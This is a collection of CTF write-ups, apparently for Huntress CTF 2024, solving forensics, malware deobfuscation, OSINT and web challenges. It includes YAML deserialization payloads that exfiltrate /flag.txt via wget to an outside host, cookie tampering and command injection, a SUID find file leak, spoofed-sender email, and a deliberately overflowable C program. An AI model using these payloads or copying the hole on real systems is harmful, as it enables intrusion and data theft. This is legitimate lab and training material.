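    """Turn 'aa:bb:...' (8 bytes) into (modifier, [non-zero key usages])."""
    raw = bytes.fromhex(line.strip().replace(":", ""))
    if len(raw) != 8:
        raise ValueError(f"expected an 8-byte report, got {len(raw)} bytes")
    return raw[0], [k for k in raw[2:8] if k]


def decode_keystrokes(lines):
    """Reconstruct typed text from a sequence of reports.

    A key is emitted only when it is present in a report and was absent from
    the previous one, so held keys and all-zero release reports do not repeat.
    """
    text = []
    previously_down = set()
    for line in lines:
        if not line.strip():
            continue
        modifier, keys = parse_report(line)
        shifted = bool(modifier & SHIFT_MASK)
        for usage in keys:
            if usage in previously_down:
                continue
            if usage == BACKSPACE:
                if text:
                    text.pop()
            elif usage in USAGE_MAP:
                text.append(USAGE_MAP[usage][1 if shifted else 0])
            else:
                text.append(f"<0x{usage:02x}>")   # unknown usage: keep it visible
        previously_down = set(keys)
    return "".join(text)


# Constructed sample: "flag{" typed, 'h' held across two reports, a typo 'y'
# removed with backspace, then "id}" (0x2f/0x30 with shift give '{' and '}').
SAMPLE_CAPTURE = """\
00:00:09:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0a:00:00:00:00:00
00:00:00:00:00:00:00:00
02:00:2f:00:00:00:00:00
02:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00
00:00:0b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0c:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1c:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:07:00:00:00:00:00
00:00:00:00:00:00:00:00
02:00:30:00:00:00:00:00
00:00:00:00:00:00:00:00
""".splitlines()

if __name__ == "__main__":
    print(decode_keystrokes(SAMPLE_CAPTURE))
```

Feeding it the real `usbPcapData` is a matter of `decode_keystrokes(open("usbPcapData"))`.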

We then use the [ctf-usb-keyboard-parser](https://github.com/TeamRocketIst/ctf-usb-keyboard-parser) and get the flag:

![image](https://github.com/user-attachments/assets/8977cec2-d6bb-4086-9ce2-fa84ceacb994)

An easier method would be to use this other [parser](https://github.com/5h4rrK/CTF-Usb_Keyboard_Parser), which allows us to pass the Wireshark capture directly; it grabs the traffic on its own:

![image](https://github.com/user-attachments/assets/6b123389-47ea-4ecf-9208-06c962c23bcd)

`flag{f7733e0093b7d281dd0a30fcf34a9634}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Forensics/Zimmer_down.md:
--------------------------------------------------------------------------------
# Zimmer down

![image](https://github.com/user-attachments/assets/e4c69cf7-37ad-4e59-a5e1-24e850d9caea)

Download: [NTUSER.DAT](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/NTUSER.DAT)

## My Solution

I have parsed NTUSER.DAT files before, but a good hint from John when announcing the challenges also leads us to use the Kali built-in tool called [regripper](https://www.kali.org/tools/regripper/):

![image](https://github.com/user-attachments/assets/2debf0ae-0b9b-4b97-bf7a-ccf26c0c45ee)

```bash
regripper -r NTUSER.DAT -a
```

We can see a lot of data:

![image](https://github.com/user-attachments/assets/44e899f8-c66f-47ed-ae92-77078841e66e)

But somewhere further down, this string drew my attention as it looked like a Base64 string.
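As an added example (not from the writeup), a scanner that does this check mechanically, for both the Sysmon CSV output of Hidden Streams and regripper output like this one: every base64-looking token is tried as base64 first and, when that yields unprintable bytes, as Base62 with CyberChef's 0-9A-Za-z alphabet (the whole token read as one big-endian number). The sample lines are constructed around the two encoded strings on this page.

```python
"""Find and decode base64-looking tokens in forensic tool output.

Added example, not part of the writeup. Tokens are tried as base64 first;
if the result is not printable text they are tried as Base62 (0-9A-Za-z
alphabet, whole token as one big-endian integer, as CyberChef does it).
The sample lines below are constructed; the encoded strings are the page's.
"""
import base64
import binascii
import re
import string

BASE62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase
TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
PRINTABLE = set(string.printable.encode())


def base62_decode(token):
    """Decode a Base62 string to bytes (0-9A-Za-z alphabet, big-endian)."""
    value = 0
    for ch in token:
        value = value * 62 + BASE62_ALPHABET.index(ch)
    return value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""


def base62_encode(data):
    """Inverse of base62_decode, used to round-trip test the decoder."""
    value = int.from_bytes(data, "big")
    out = ""
    while value:
        value, rem = divmod(value, 62)
        out = BASE62_ALPHABET[rem] + out
    return out or "0"


def _looks_printable(data):
    return bool(data) and all(b in PRINTABLE for b in data)


def try_decode(token):
    """Return (scheme, text) for the first decoding that yields printable text."""
    padded = token + "=" * (-len(token) % 4)       # base64 needs a multiple of 4
    try:
        data = base64.b64decode(padded, validate=True)
        if _looks_printable(data):
            return "base64", data.decode()
    except binascii.Error:
        pass
    if all(ch in BASE62_ALPHABET for ch in token):
        data = base62_decode(token)
        if _looks_printable(data):
            return "base62", data.decode()
    return None


def scan_lines(lines):
    """Yield (line_no, token, scheme, decoded) for every decodable token."""
    for line_no, line in enumerate(lines, 1):
        for match in TOKEN_RE.finditer(line):
            result = try_decode(match.group(0))
            if result:
                yield line_no, match.group(0), result[0], result[1]


# Constructed sample: one Sysmon CSV row and two regripper-style lines
SAMPLE_LINES = [
    '2024-10-01 12:00:00,1,"powershell.exe -c \\"echo ZmxhZ3tiZmVmYjg5MTE4MzAzMmY0NGZhOTNkMGM3YmQ0MGRhOX0=\\""',
    "TypedPaths\\url1 -> C:\\Users\\user\\Desktop",
    "LastKey -> VJGSuERgCoVhl6mJg1x87faFOPIqacI3Eby4oP5MyBYKQy5paDF b62",
]

if __name__ == "__main__":
    for line_no, token, scheme, decoded in scan_lines(SAMPLE_LINES):
        print(f"line {line_no}: {scheme}: {decoded}")
```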

![image](https://github.com/user-attachments/assets/21a0f165-40b6-4cab-88e0-d69cad1e6176)

But not quite: the b62 at the end is another clue that this is actually a Base62 encoded string, which we can decode using [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base62('0-9A-Za-z')&input=VkpHU3VFUmdDb1ZobDZtSmcxeDg3ZmFGT1BJcWFjSTNFYnk0b1A1TXlCWUtReTVwYURG) to get the flag:

![image](https://github.com/user-attachments/assets/693afddf-e9d1-42a9-9818-e79640ec96c7)

`flag{4b676ccc1070be66b1a15dB601c8d500}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Malware/Obfuscation_Station.md:
--------------------------------------------------------------------------------
# Obfuscation Station

![image](https://github.com/user-attachments/assets/c75d2f3d-dde4-44b5-9c74-0dca1cc5c20a)

Download: [Challenge.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/Challenge.zip)

## My Solution

We have some PowerShell within the zip archive:

![image](https://github.com/user-attachments/assets/b0a9500c-780c-415b-b4c1-d8ee64a74894)

The end part is just the script being piped to IEX, so we want to avoid that.
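As an added example (not the writeup's code), the same stage can be unpacked in Python without running any PowerShell: .NET's DeflateStream writes a raw DEFLATE stream with no zlib header, so zlib needs negative wbits, which is also why CyberChef's Raw Inflate works. The base64 blob is the one carried by the script; the round-trip helper constructs its own test data.

```python
"""Unpack a Base64 + .NET DeflateStream stage without running PowerShell.

Added example, not part of the writeup. DeflateStream emits raw DEFLATE
(no zlib header), so zlib.decompress needs negative wbits. inflate_any()
tries the common framings in turn so the same helper covers zlib-wrapped
and gzip stages too. BLOB is the string from the script on this page.
"""
import base64
import zlib

BLOB = "UzF19/UJV7BVUErLSUyvNk5NMTM3TU0zMDYxNjSxNDcyNjexTDY2SUu0NDRITDWpVQIA"

# Framings to try, in order: zlib-wrapped, gzip, raw DEFLATE
FRAMINGS = (
    ("zlib", zlib.MAX_WBITS),
    ("gzip", 16 + zlib.MAX_WBITS),
    ("raw", -zlib.MAX_WBITS),
)


def inflate_any(data):
    """Return (framing, bytes) for the first framing that decompresses."""
    for kind, wbits in FRAMINGS:
        try:
            return kind, zlib.decompress(data, wbits)
        except zlib.error:
            continue
    raise ValueError("not a DEFLATE stream in any known framing")


def inflate_b64(blob, encoding="ascii"):
    """Base64-decode, inflate, and read the bytes as text the way the
    script's StreamReader does (ASCII; undecodable bytes are replaced)."""
    kind, data = inflate_any(base64.b64decode(blob))
    return kind, data.decode(encoding, errors="replace")


def raw_deflate_b64(text):
    """Build the same kind of blob (raw DEFLATE, then Base64) for round-trips."""
    comp = zlib.compressobj(level=9, wbits=-zlib.MAX_WBITS)
    data = comp.compress(text.encode("ascii")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


if __name__ == "__main__":
    kind, text = inflate_b64(BLOB)
    print(f"[{kind}] {text}")
```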
I replaced it with an echo so it simply unravels itself:

```powershell
(nEW-objECt SYstem.iO.COMPreSsIon.deFlaTEStREAm( [IO.mEmORYstreAM][coNVERt]::FROMBAse64sTRING( `
'UzF19/UJV7BVUErLSUyvNk5NMTM3TU0zMDYxNjSxNDcyNjexTDY2SUu0NDRITDWpVQIA'), `
[io.COmPREssioN.coMpreSSioNmODE]::DeCoMpReSS) | `
%{ nEW-objECt sYStEm.Io.StREAMrEADeR($_,[TeXT.encodiNG]::AsCii) } | `
%{ $_.READTOENd() }) | echo
```

![image](https://github.com/user-attachments/assets/408713cb-a1dd-4f1a-a370-cf6cce5a48a5)

Following the code logic, we can also do it in [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Raw_Inflate(0,0,'Adaptive',false,false)&input=VXpGMTkvVUpWN0JWVUVyTFNVeXZOazVOTVRNM1RVMHpNRFl4TmpTeE5EY3lOamV4VERZMlNVdTBORFJJVERXcFZRSUE&oeol=FF).

`flag{3ed675ef0343149723749c34fa910ae4}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Malware/Ping_Me.md:
--------------------------------------------------------------------------------
# Ping Me

![image](https://github.com/user-attachments/assets/daab6ee7-57da-48a0-9916-4583349d9414)

Download: [ping_me.vbs](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/ping_me.vbs)

## My Solution

We see that the provided .vbs file executes a script:

![image](https://github.com/user-attachments/assets/9c372e27-9f98-47c9-93f3-438169616329)

So I replaced the Execute with `WScript.Echo` to print the unravelled payload instead when we run it.

![image](https://github.com/user-attachments/assets/aed4114f-6d91-4954-8dd1-9186a8f86f4c)

The next stage seems to be pinging some IPs.

![image](https://github.com/user-attachments/assets/d9387f9d-350f-411d-ba97-1635264c9104)

However, if we separate the numbers in the IPs and decode them from decimal, we get our flag. We can again use [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Decimal('Space',false)&input=MTAyIDEwOCA5NyAxMDMgMTIzIDU0IDEwMCA0OSA5OCA1NCA0OCA1MiA5OCA5OCA0OSA5OCA1NCAxMDAgOTcgNTEgNTAgOTggNTYgOTggOTggOTkgOTcgNTcgMTAxIDUwIDU0IDEwMCA1MyA0OSA1MyA1NiA1NyAxMjUgMzUgMzU&oeol=FF).

`flag{6d1b604bb1b6da32b8bbca9e26d51589}##`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Malware/Rustline.md:
--------------------------------------------------------------------------------
# Rustline

![image](https://github.com/user-attachments/assets/9e82ace9-1bb1-4804-aa94-03bc7f82cb46)

Download: [challenge.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/challenge-rustline.zip)

## My Solution

Running strings on the provided file and looking for the word `huntress`, we find another interesting domain:

![image](https://github.com/user-attachments/assets/d627767c-8c42-4cd9-bd0c-f3f403343a37)

Just like in the `eepy` challenge, I added the domain to my hosts file and ran the binary while listening on port 80:

![image](https://github.com/user-attachments/assets/1ebfa755-eb35-48c8-b47f-2572e1c55f3e)

When running the provided binary in [CommandoVM](https://github.com/mandiant/commando-vm) with [ProcMon](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon) running, I saw that it read files only from the `challenge-files` folder:

![image](https://github.com/user-attachments/assets/81f0db72-b42c-4ccf-b92e-b4af898bd607)

It was encrypting every file in this folder and sending it to this domain, but the encrypted content was always the same, so I added
the encrypted flag.txt file to it and ran the binary. It seems that whatever encryption it was doing, probably XOR, was reversible without me needing to do anything else.

![image](https://github.com/user-attachments/assets/e39648b2-a18b-4cf2-8f15-ac09797c342c)

`flag{bfe12aadd139def4d47f5f51a539249d}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Malware/eepy.md:
--------------------------------------------------------------------------------
# eepy

![image](https://github.com/user-attachments/assets/df766314-095a-42fd-b2da-29f9e649e59f)

Download: [eepy.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/eepy.zip)

## My Solution

When running the provided binary in [CommandoVM](https://github.com/mandiant/commando-vm) with [ProcMon](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon) running, we can see it trying to make requests to a `supermegasus.huntress.local` domain via HTTP, so port 80.

![image](https://github.com/user-attachments/assets/c78c7c92-d239-4bdb-9b2a-6a49fd37c384)

So I stood up a netcat listener on localhost port 80 after adding the domain to the hosts file and ran the binary again:

![image](https://github.com/user-attachments/assets/c83b0452-2da0-4b3f-8f08-6b02fda8b2cf)

As we can see, it is making requests to me. While it was doing that, I created a process dump from Task Manager, ran strings on it, grepped for the flag and found it. Pretty cheesy.

![image](https://github.com/user-attachments/assets/8e80cf1e-978a-45ea-b69a-dd92e93698c3)

`flag{2feb3ff8a21a36db1ad386d33a29d85a}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Misc/1200_Transmissions.md:
--------------------------------------------------------------------------------
# 1200 Transmissions

![image](https://github.com/user-attachments/assets/98fb4df7-7ede-4a52-8c09-4c9398c4bd42)

Download: [transmissions.wav](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/transmissions.wav)

## My Solution

A quick google search for similar challenges yields a promising [result](https://ctftime.org/writeup/23189):

![image](https://github.com/user-attachments/assets/5dd2f4e4-2946-4a3b-9452-ae7dd44b6af6)

So we install and run the same tool:

```bash
sudo apt install minimodem
minimodem -r -f transmissions.wav 1200
```

And we get the flag:

![image](https://github.com/user-attachments/assets/7a7f3429-b0b3-4d89-b55a-c5b1655e4ec7)

`flag{f28d133e7174c412c1e39b4a84158fa3}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Misc/Red_Phish_Blue_Phish.md:
--------------------------------------------------------------------------------
# Red Phish Blue Phish

![image](https://github.com/user-attachments/assets/db9fa560-2d7e-4d90-a476-82b759285fb9)

## My Solution

A quick google search of the company name reveals an actual website:

![image](https://github.com/user-attachments/assets/652bf541-ec6f-4e0d-a2a3-b5a8df8ec93e)

In the [team](https://pyrchdata.com/team) section we can find multiple other employees:

![image](https://github.com/user-attachments/assets/814dafbb-ec2d-4bcd-88e7-e000dbc248c9)

Since this is a phishing
exercise, we know the email format and we know that the provided port is an SMTP server, so we try sending emails on behalf of swilliams to all the employees. Eventually, when we get to the IT Manager, it seems he has an interesting automated message as a reply.

```bash
swaks --to swilliams@pyrchdata.com --from jdaveren@pyrchdata.com --header "Subject: pentest" --body "give me the flag, pretty please" --server challenge.ctf.games --port 31594
```

![image](https://github.com/user-attachments/assets/0633bcc9-e14c-4cfa-9c03-14adb177d523)

`flag{54c6ec05ca19565754351b7fcf9c03b2}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Misc/Sekiro.md:
--------------------------------------------------------------------------------
# Sekiro

![image](https://github.com/user-attachments/assets/af4d6bf9-b9fa-491e-9073-3098ab611d2b)

## My Solution

Going through the service and experimenting with our inputs, we soon find that it's basically Rock Paper Scissors.

We can script it to automate it and get the flag:

```python
#!/usr/bin/python3

from pwn import *
context.log_level = "warn"

p = remote('challenge.ctf.games', 32523)

# What beats what, as worked out by experimenting:
# retreat < strike
# strike < block
# block < advance
# advance < retreat
COUNTER = {
    b'block': b'advance',
    b'retreat': b'strike',
    b'strike': b'block',
    b'advance': b'retreat',
}

while True:
    try:
        p.recvuntil(b'Opponent move: ')
        action = p.recvline()
    except EOFError:
        # the service closed the connection: the rounds are over
        break
    for move, answer in COUNTER.items():
        if move in action:
            p.recvuntil(b'Your move: ')
            p.sendline(answer)
            break

# hand the session over so the remaining output (the flag) is shown
p.interactive()
```

![image](https://github.com/user-attachments/assets/4f340daf-d57f-4dce-9233-b18ba37e4d1c)

`flag{a1ae4e5604576818132ce3bfebe95de5}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/OS INT/Ran_somewhere.md:
--------------------------------------------------------------------------------
# Ran somewhere

![image](https://github.com/user-attachments/assets/87dba907-d231-40ef-b6bc-6cf3991e108b)

Download: [ran_somewhere.eml](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/ran_somewhere.eml)

## My Solution

The provided `.eml` message file looks like this when opened in Outlook:

![image](https://github.com/user-attachments/assets/2b2661ae-adf2-4c1e-bd73-1f33d9c663ff)

We see a mention of `fortified`, which seems like a hint:

![image](https://github.com/user-attachments/assets/0ad28c95-5869-4e6d-9f7e-ae09d19027d6)

The two .dat files are in fact pictures.
The second one drew my attention as it had a bit more to work with in terms of interesting things to look at:

![image](https://github.com/user-attachments/assets/e7a956c0-9ac0-4ee5-9d33-25f86d6f267b)

On the right side, we can see a partial sign with some text; zoomed in, it looks like this:

![image](https://github.com/user-attachments/assets/87c4dce3-7585-4512-8821-e953ec86a4d6)

Googling the part of the words that can be seen, together with the word fort (as indicated by the "fortified" from the email) and the word plaque, because that's what it is, we find the exact same plaque we have in the picture:

![image](https://github.com/user-attachments/assets/a4e96234-872d-45f5-badb-f5a6f76fbd79)

The plaque itself contains the location: `Reckord Armory`

Answer: `Reckord Armory`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Others/Echo_Chamber.md:
--------------------------------------------------------------------------------
# Echo Chamber

![image](https://github.com/user-attachments/assets/d1f75992-40e4-45f0-b120-92a115c2e051)

Download: [echo_chamber.pcap](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/echo_chamber.pcap)

## My Solution

The provided pcap file contains ICMP traffic:

![image](https://github.com/user-attachments/assets/0269335e-3e96-499a-88ef-37adf1902174)

Using tshark, I extracted only the echo requests (type 8):

```bash
tshark -r echo_chamber.pcap -Y "icmp.type == 8" -T fields -e data
```

And saw repeating values:

![image](https://github.com/user-attachments/assets/60a2d7f6-b61f-4e38-ab0f-a71ac47987e6)

So I decided to take just the first 2 characters of each, which look like hex, and decode them:

```bash
tshark -r echo_chamber.pcap -Y "icmp.type == 8" -T fields -e data 2>/dev/null | sed 's/^\(.\{2\}\).*/\1/' | xxd -r -p
```

Based on the header, the result was a PNG file:

![image](https://github.com/user-attachments/assets/b60f61db-9e2c-4a6a-9e4f-a2e7aba1ecf2)

And we have our flag:

![image](https://github.com/user-attachments/assets/cee6c2c9-22e3-4a3b-8555-dbb12bf6ff04)

`flag{6b38aa917a754d8bf384dc73fde633ad}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/README.md:
--------------------------------------------------------------------------------
This month-long CTF from [Huntress](https://www.huntress.com/) was much tougher than last year's. There were many more RE challenges, which required a much better knowledge of assembly, Go or Rust than I have or care to develop.

That being said, I did still get a slightly better position on the scoreboard than last year, so I'm happy with that. I got 90th out of 3444 teams, which is the top 2.6%.

![image](https://github.com/user-attachments/assets/7d8ecfca-56fb-47e9-9fdf-622a576b6a4e)
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Warmups/Finders_Fee.md:
--------------------------------------------------------------------------------
# Finders Fee

![image](https://github.com/user-attachments/assets/6e38ed81-b5f2-4752-823e-4e703b47efee)

## My Solution

We are dropped into a shell where the `find` command has the SUID bit set and the flag is in the `finder` user's home directory. Looking through find's help, we can see that the `-files0-from` argument lets us give it a file from which to read the list of files to search.

![image](https://github.com/user-attachments/assets/2dfc11cf-283b-4cce-ac58-a4deba4a9620)

However, like other binaries, when it cannot find the file you provide, it tells you so with a verbose error message, and as such you can leak information.

```bash
find -files0-from /home/finder/flag.txt
```

![image](https://github.com/user-attachments/assets/e9dc2dac-da8c-4a22-9477-e887252f5ab6)

`flag{5da1de289823cfc200adf91d6536d914}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Warmups/Mystery.md:
--------------------------------------------------------------------------------
# Mystery

![image](https://github.com/user-attachments/assets/b03b0809-03c4-412d-aa1c-65f832ad40b5)

## My Solution

This one was puzzling at the beginning. I knew there was enough information in the description to figure out what it was encoded with, but I couldn't quite put my finger on it, so I asked ChatGPT.

![image](https://github.com/user-attachments/assets/0f91c826-068a-4e25-b7d7-7886197c0344)

It mentioned the Enigma machine and gave a Python script to decode the message:

```bash
pip3 install py-enigma
```

```python
from enigma.machine import EnigmaMachine

# Set up the Enigma machine with the settings from the challenge description
machine = EnigmaMachine.from_key_sheet(
    rotors='VI I III',
    reflector='B',
    ring_settings='1 1 1',  # Ring settings in the key sheet start from 1 (A = 1)
    plugboard_settings='BQ CR DI EJ KW MT OS PX UZ GH'
)

# Set the initial rotor positions
machine.set_display('AQL')  # Initial rotor positions A, Q, L

# Ciphertext (spaces removed; process_text upper-cases the letters itself)
ciphertext = 'rkenr wozec gtrfl obbur bfgma fkgyq ctkvq zeucz hlvwx yyzat zbvns kgyyd sthmi vsifc ovexl zzdqv slyir nwqoj igxuu kdqgr fdbbd njppc mujyy wwcoy'.replace(' ', '')

# Decrypt the message
plaintext = machine.process_text(ciphertext)

print('Decrypted Message:', plaintext)
```

![image](https://github.com/user-attachments/assets/ecd65168-6a51-4b37-b481-8cc6778fbcce)

`FLAGFDFEABCACBEBFBADAEFBECCAADDDBAFEZZZ`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Warmups/TXT_Message.md:
--------------------------------------------------------------------------------
# TXT Message

![image](https://github.com/user-attachments/assets/5f9a4596-6227-4fbe-8c10-9d1505664461)

## My Solution

The title of the challenge immediately made me think of the DNS TXT record, which I checked using `dig`:

![image](https://github.com/user-attachments/assets/f9b08084-a7f6-4900-b816-66580a3c4bbb)

We can see some numbers which look like octal:

```text
146 154 141 147 173 061 064 145 060 067 062 146 067 060 065 144 064 065 070 070 062 064 060 061 144 061 064 061 143 065 066 062 146 144 143 060 142 175
```

We confirm this by decoding it from octal using [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Octal('Space')&input=MTQ2IDE1NCAxNDEgMTQ3IDE3MyAwNjEgMDY0IDE0NSAwNjAgMDY3IDA2MiAxNDYgMDY3IDA2MCAwNjUgMTQ0IDA2NCAwNjUgMDcwIDA3MCAwNjIgMDY0IDA2MCAwNjEgMTQ0IDA2MSAwNjQgMDYxIDE0MyAwNjUgMDY2IDA2MiAxNDYgMTQ0IDE0MyAwNjAgMTQyIDE3NQ):

![image](https://github.com/user-attachments/assets/2e5fb2a0-8b56-4a7e-bbf9-07a6fcdbe7ca)

`flag{14e072f705d45882401d141c562fdc0b}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Warmups/The_Void.md:
--------------------------------------------------------------------------------
# The Void

![image](https://github.com/user-attachments/assets/4765d286-fb5d-4886-b1be-5e63199cbd3f)

## My Solution

This was a weird one. When connecting to the port it provides, it just starts printing out seemingly nothing, only spaces, in the terminal.

However, if we redirect the output to a file and then read the file very carefully, we will see the flag letters hidden one by one after an ANSI escape code that is used to format text in the terminal, specifically the blank-looking part.

![image](https://github.com/user-attachments/assets/9ff927d9-a9c9-449a-a136-db57ef0faf15)

Here's what each part means in `[30;40m`:

30: Sets the foreground text color to black.
40: Sets the background color to black.
m: Marks the end of the sequence.

For instance, running this command in the terminal would make the text appear invisible:

```bash
echo -e "\033[30;40mThis text is invisible\033[0m"
```

![image](https://github.com/user-attachments/assets/241dc688-d046-4133-84f5-f71fd3a0be83)

`flag{b1370ac4fadd8c0237f8771d7d77286a}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Warmups/Zulu.md:
--------------------------------------------------------------------------------
# Zulu

![image](https://github.com/user-attachments/assets/8587e755-ff3d-48d1-aa5f-26b63b36394d)

Download: [zulu](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/zulu)

## My Solution

The provided file seems to be `compress'd data 16 bits`:

![image](https://github.com/user-attachments/assets/6fe8b098-feef-498e-8f6d-90a5be2388ca)

A quick google search indicates that this should be a `.z` compressed file:

![image](https://github.com/user-attachments/assets/5e614f3f-0ef9-4482-9a2b-510dd9a08a6c)

Within the Stack Overflow post, we can see how to decompress such files as well:

![image](https://github.com/user-attachments/assets/13256440-a394-4522-ac40-3a0950361bfd)

So we rename it accordingly, use the `uncompress` command to decompress it and get our flag:

```bash
mv zulu zulu.z
uncompress zulu.z
cat zulu
```

`flag{74235a9216ee609538022e6689b4de5c}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Web/Plantopia.md:
--------------------------------------------------------------------------------
# Plantopia

![image](https://github.com/user-attachments/assets/cc6dd8d7-7100-41f9-b73e-31e8a5b3a114)

## My Solution

We log in to the web page using the provided credentials and notice
that the cookie is just a base64 string.

![image](https://github.com/user-attachments/assets/1755895a-c2ca-478e-8c27-286f080685a3)

It consists of the user, a 0 and an epoch time.

As you might imagine, just changing the 0 to a 1 gives us access to the admin panel:

![image](https://github.com/user-attachments/assets/0f59389f-3848-4063-9a2e-452fd598be97)

The app also lets us see the API endpoints, so we know there's an option to see the logs, to send mail and to update the settings.

![image](https://github.com/user-attachments/assets/3e5dc645-9422-47eb-95f8-1da9599b153b)

We start by updating the settings of the alert to test for command injection:

![image](https://github.com/user-attachments/assets/864bff77-70f1-4860-b24f-0cd1d27801ff)

Then we trigger the sendmail function:

![image](https://github.com/user-attachments/assets/26287167-41e9-4efc-9a02-deebe1329290)

And then check the logs to get our flag:

![image](https://github.com/user-attachments/assets/1ffe547a-975f-4640-859d-6ef14e514d8e)

`flag{c29c4d53fc432f7caeb573a9f6eae6c6}`
--------------------------------------------------------------------------------
/Huntress-CTF-2024/Web/Y2J.md:
--------------------------------------------------------------------------------
# Y2J

![image](https://github.com/user-attachments/assets/d16b8f9c-f146-4540-ad18-061143c10f05)

## My Solution

When accessing the page we have only one function: to convert YAML to JSON.

![image](https://github.com/user-attachments/assets/9ee0f4b2-703e-454d-b41d-82824a3fe52d)

This is a classic case of Python YAML deserialization.
We can get the flag in a number of ways:

Example 1:

```yaml
!!python/object/apply:os.system
- !!python/str "wget https://lazytitan33.free.beeceptor.com/?f=`cat /flag.txt`"
```

Example 2:

```yaml
!!python/object/apply:posix.system
- wget https://lazytitan33.free.beeceptor.com/?f=`cat /flag.txt`
```

`flag{b20870a1955ac22377045e3b2dcb832a}`
/Huntress-CTF-2024/challenge-files/app.zip: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/app.zip
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/babybufov: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/babybufov
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/babybufov.c: --------------------------------------------------------------------------------
```c
// The header names were lost when this file was extracted (the <...> parts were
// stripped); stdio.h and unistd.h are what puts/gets/setbuf and execve need.
#include <stdio.h>
#include <unistd.h>

//gcc -fno-pie -no-pie -Wno-implicit-function-declaration -fno-stack-protector -m32 babybufov.c -o babybufov
// -no-pie: target() sits at a fixed address; -fno-stack-protector: no canary between
// buf and the saved return address; -m32: the return address is 4 bytes wide.

void target(){
    puts("Jackpot!");
    char* executable="/bin/bash";
    char* argv[]={executable, NULL};
    execve(executable,argv,NULL);
}

int vuln(){
    char buf[16];
    gets(buf);      // no length check: anything past 16 bytes overwrites the stack frame
    return 0;
}

int main(){
    setbuf(stdin,NULL);
    setbuf(stdout,NULL);
    puts("Gimme some data!");
    fflush(stdout);
    vuln();
    puts("Failed... :(");
}
```
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/based.txt: --------------------------------------------------------------------------------
楈繳籁萰杁癣怯蘲詶歴蝕絪敪ꕘ橃鹲𠁢腂𔕃饋𓁯𒁊鹓湵蝱硦楬驪腉繓鵃舱𒅡繃絎罅陰罌繖𔕱蝔浃虄眵虂𒄰𓉋詘襰ꅥ破ꌴ顂𔑫硳蕈訶𒀹饡鵄腦蔷樸𠁺襐浸椱欱蹌ꍣ鱙癅腏葧𔕇鱋鱸𓁮聊聍ꄸꈴ陉𔕁框ꅔ𔕩𔕃驂虪祑𓅁聨朸聣摸眲葮𖠳鵺穭𒁭豍摮饱恕𓉮詔葉鰸葭楷洳面𔕃𔑒踳𔐸杅𐙥湳橹驳陪楴氹橬𓄱蝔晏稸ꄸ防癓ꉁ𖡩鵱聲ꍆ稸鬶魚𓉯艭𔕬輷茳筋𔑭湰𓄲怸艈恧襺陷项譶ꍑ衮汮蹆杗筌蹙怰晘缸睰脹蹃鹬ꕓ脶湏赑魶繡罢𒉁荶腳ꌳ蕔𔐶橊欹𖥇繋赡𐙂饎罒鵡𒉮腙ꍮ楑恤魌虢昹𒅶效楙衎𔕙ꉨ𓈸𔑭樯筶筚絮𓁗浈豱ꉕ魔魧蕕聘筣鹖樫ꍖ汸湖萰腪轪𓉱艱絍笹艨魚詇腁𒁮陴顮虂癁
